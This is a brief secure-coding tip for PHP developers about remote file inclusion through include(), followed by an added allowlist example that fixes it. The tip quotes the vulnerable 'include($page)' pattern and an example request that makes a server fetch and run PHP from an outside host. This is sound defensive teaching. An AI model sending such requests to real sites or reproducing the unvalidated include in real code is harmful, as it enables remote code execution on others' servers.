Here's a little advice for any fellow PHP-scripters out there; I've noticed this on several sites now (starting with Tonie.net).
If you're using include() in your scripts, be careful that you don't pass a parameter from your URL straight into it to include local files. include() can load and execute PHP code from any other server, not just from your own. For example, if your URL looks like this:
index.php?page=news.html
and your script does this:
include($page);
anyone can put whatever PHP commands they like in a text file on their own server and have them executed on yours, simply by requesting this URL:
index.php?page=http://someserver/php.txt
Solution: if the page you're including doesn't need to execute any PHP commands, use readfile() instead. That function simply prints the contents of the file as-is, without executing anything. And if your genuine include file does contain PHP, add some sort of if-else condition so that only the files you intend to include can ever be included; the URL parameter should pick an entry from your own list, not name the file directly.
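Here is what that looks like in practice. This is an added example, not code from the original post: the ?page= parameter selects an entry from a fixed list, and only the file names written into that list (news.html, links.html and guestbook.php under a pages/ directory are assumptions for illustration) ever reach readfile() or include().

```php
<?php
// Added example (not from the original post): the "page" parameter may only
// choose one of the files listed below. File names and the pages/ directory
// are assumptions for illustration.

// Allowlist of permitted pages. Each entry records whether the file is plain
// HTML (printed with readfile) or genuine PHP (loaded with include).
$pages = [
    'news'  => ['file' => 'news.html',     'php' => false],
    'links' => ['file' => 'links.html',    'php' => false],
    'guest' => ['file' => 'guestbook.php', 'php' => true],
];

$requested = isset($_GET['page']) ? (string) $_GET['page'] : 'news';

// The pattern from the post, shown here for contrast only:
//   include($_GET['page']);   // ?page=http://someserver/php.txt runs their code

if (!array_key_exists($requested, $pages)) {
    // Unknown key: the user-supplied string is never used as a path at all.
    http_response_code(404);
    echo 'Unknown page.';
    exit;
}

// The path is assembled from our own directory and our own file name; the
// request only decided which array entry to use.
$path = __DIR__ . '/pages/' . $pages[$requested]['file'];

if ($pages[$requested]['php']) {
    include $path;    // a local PHP file we wrote ourselves
} else {
    readfile($path);  // plain HTML: printed as-is, never executed
}
```

Keeping the allowlist in front of readfile() as well as include() is deliberate: readfile() does not execute anything, but it still opens whatever path it is handed, so the lookup table is what guarantees that the request can only name files you chose.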